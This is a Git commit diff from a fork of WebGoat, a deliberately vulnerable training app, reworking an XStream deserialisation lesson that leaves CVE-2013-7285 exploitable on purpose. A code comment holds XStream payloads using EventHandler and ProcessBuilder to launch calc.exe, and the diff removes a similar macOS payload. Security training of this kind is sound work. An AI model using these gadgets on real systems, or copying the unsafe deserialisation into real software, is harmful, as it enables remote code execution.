dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first step

Browse Source
This commit is contained in:
René Zubcevic 2020-07-05 09:31:32 +02:00 committed by Nanne Baars
parent 317573c897
commit db9e1c4c4f
6 changed files with 114 additions and 53 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/Contact.java
View File

@ -22,19 +22,14 @@
package org.owasp.webgoat.vulnerable_components; package org.owasp.webgoat.vulnerable_components;
import com.thoughtworks.xstream.annotations.XStreamAlias; public interface Contact {
@XStreamAlias("contact")
public class Contact {
@XStreamAlias("name")
String name;
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public Integer getId();
public void setId(Integer id);
public String getFirstName();
public void setFirstName(String firstName);
public String getLastName();
public void setLastName(String lastName);
public String getEmail();
public void setEmail(String email);
} }

8
webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/ContactConverter.java
View File

@ -36,15 +36,15 @@ public class ContactConverter implements Converter {
public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) { public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) {
Contact contact = (Contact) value; Contact contact = (Contact) value;
writer.startNode("name"); writer.startNode("firstName");
writer.setValue(contact.getName()); writer.setValue(contact.getFirstName());
writer.endNode(); writer.endNode();
} }
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
Contact contact = new Contact(); Contact contact = new ContactImpl();
reader.moveDown(); reader.moveDown();
contact.setName(reader.getValue()); contact.setFirstName(reader.getValue());
reader.moveUp(); reader.moveUp();
return contact; return contact;
} }

35
webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/ContactImpl.java Normal file
View File

@ -0,0 +1,35 @@
/*
* This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
*
* Copyright (c) 2002 - 2019 Bruce Mayhew
*
* This program is free software; you can redistribute it and/or modify it under the terms of the
* GNU General Public License as published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
* even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with this program; if
* not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
* 02111-1307, USA.
*
* Getting Source ==============
*
* Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
*/
package org.owasp.webgoat.vulnerable_components;
import lombok.Data;
@Data
public class ContactImpl implements Contact {
private Integer id;
private String firstName;
private String lastName;
private String email;
}

89
webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLesson.java
View File

@ -24,54 +24,83 @@ package org.owasp.webgoat.vulnerable_components;
import com.thoughtworks.xstream.XStream; import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver; import com.thoughtworks.xstream.io.xml.DomDriver;
import org.apache.commons.lang3.StringUtils;
import org.owasp.webgoat.assignments.AssignmentEndpoint; import org.owasp.webgoat.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentHints;
import org.owasp.webgoat.assignments.AttackResult; import org.owasp.webgoat.assignments.AttackResult;
import org.springframework.web.bind.annotation.*; import org.springframework.web.bind.annotation.*;
@RestController @RestController
//@AssignmentHints({"http-basics.hints.http_basics_lesson.1"}) @AssignmentHints({"vulnerable.hint"})
public class VulnerableComponentsLesson extends AssignmentEndpoint { public class VulnerableComponentsLesson extends AssignmentEndpoint {
/*
*
<contact class='org.owasp.webgoat.vulnerable_components.Contact'>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>calc.exe</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
<contact class='dynamic-proxy'>
<interface>org.owasp.webgoat.vulnerable_components.Contact</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>calc.exe</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
*/
@PostMapping("/VulnerableComponents/attack1") @PostMapping("/VulnerableComponents/attack1")
public @ResponseBody public @ResponseBody
AttackResult completed(@RequestParam String payload) { AttackResult completed(@RequestParam String payload) {
XStream xstream = new XStream(new DomDriver()); XStream xstream = new XStream(/*new DomDriver()*/);
xstream.setClassLoader(Contact.class.getClassLoader()); xstream.setClassLoader(Contact.class.getClassLoader());
xstream.processAnnotations(Contact.class); //xstream.processAnnotations(Contact.class);
xstream.alias("contact", ContactImpl.class);
//xstream.aliasField("id", Contact.class, "id");
xstream.ignoreUnknownElements();
//xstream.registerConverter(new ContactConverter()); //xstream.registerConverter(new ContactConverter());
//xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW); //xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW);
// Contact c = new Contact(); Contact contact = null;
// c.setName("Alvaro");
// String sc = xstream.toXML(c);
// System.out.println(sc);
// String payload2 = "<sorted-set>" +
// "<string>foo</string>" +
// "<dynamic-proxy>" +
// "<interface>java.lang.Comparable</interface>" +
// "<handler class=\"java.beans.EventHandler\">" +
// " <target class=\"java.lang.ProcessBuilder\">" +
// " <command>" +
// " <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>" +
// " </command>" +
// " </target>" +
// " <action>start</action>" +
// "</handler>" +
// "</dynamic-proxy>" +
// "</sorted-set>";
try { try {
// System.out.println("Payload:" + payload);
Contact expl = (Contact) xstream.fromXML(payload);
return success(this).feedback("vulnerable-components.fromXML").feedbackArgs(expl.toString()).build(); if (!StringUtils.isEmpty(payload)) {
} catch (com.thoughtworks.xstream.converters.ConversionException ex) { //payload = payload.replace("contact ", "<contact ").replace("/contact ", "</contact");
if (ex.getMessage().contains("Integer")) { payload = payload.replace("+", "").replace("\r", "").replace("\n", "").replace("> ", ">").replace(" <", "<");
}
System.out.println(payload);
contact = (Contact) xstream.fromXML(payload);
} catch (Exception ex) {
return failed(this).feedback("vulnerable-components.close").output(ex.getMessage()).build();
}
try {
if (null!=contact) {
contact.getFirstName();//trigger the example like https://x-stream.github.io/CVE-2013-7285.html
}
} catch (Exception e) {
e.printStackTrace();
return success(this).feedback("vulnerable-components.success").build(); return success(this).feedback("vulnerable-components.success").build();
} }
return failed(this).feedback("vulnerable-components.close").build(); return failed(this).feedback("vulnerable-components.fromXML").feedbackArgs(contact).build();
}
} }
} }

3
webgoat-lessons/vulnerable-components/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -1,6 +1,7 @@
vulnerable-components.title=Vulnerable Components vulnerable-components.title=Vulnerable Components
EnterYourName=Enter your Name EnterYourName=Enter your Name
Go!=Go! Go!=Go!
vulnerable.hint=Here is some explanation of someone trying the exercise in an earlier version: https://www.youtube.com/watch?v=iWcRR2WcBFU
vulnerable-components.close=Trying to deserialize null object. vulnerable-components.close=Trying to deserialize null object.
vulnerable-components.success=If you are not seeing the application you started; it may be minimized vulnerable-components.success=You successfully tried to exploit the CVE-2013-7285 vulnerability
vulnerable-components.fromXML=You created contact {0}. This means you did not exploit the remote code execution. vulnerable-components.fromXML=You created contact {0}. This means you did not exploit the remote code execution.

1
webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content5a.adoc
View File

@ -12,3 +12,4 @@ WebGoat Sends an XML document to add contacts to a contacts database.
---- ----
For this example, we will let you enter the xml directly versus intercepting the request and modifying the data. You provide the XML representation of a contact and WebGoat will convert it a Contact object using `XStream.fromXML(xml)`. For this example, we will let you enter the xml directly versus intercepting the request and modifying the data. You provide the XML representation of a contact and WebGoat will convert it a Contact object using `XStream.fromXML(xml)`.
So find information about the CVE vulnerability and sends some payload that triggers the vulnerability.